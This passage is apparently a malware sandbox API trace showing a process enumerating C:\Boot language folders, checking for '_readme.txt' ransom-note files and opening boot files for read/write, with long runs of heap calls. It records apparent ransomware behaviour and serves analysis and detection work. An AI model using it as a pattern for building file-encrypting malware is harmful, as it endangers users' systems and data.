ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.743] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned=".txt" [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.743] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.743] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.743] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.743] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.743] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.743] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.744] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.745] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.745] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.745] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0146.745] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.745] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.745] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.745] PathFindFileNameW (pszPath="") returned="" [0146.745] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.745] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.747] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.747] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.747] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.747] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0146.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.747] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0146.747] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.747] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.747] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.747] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0146.747] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.748] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.748] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned=".txt" [0146.748] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.748] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.748] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.748] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.748] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.749] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.750] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.751] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, 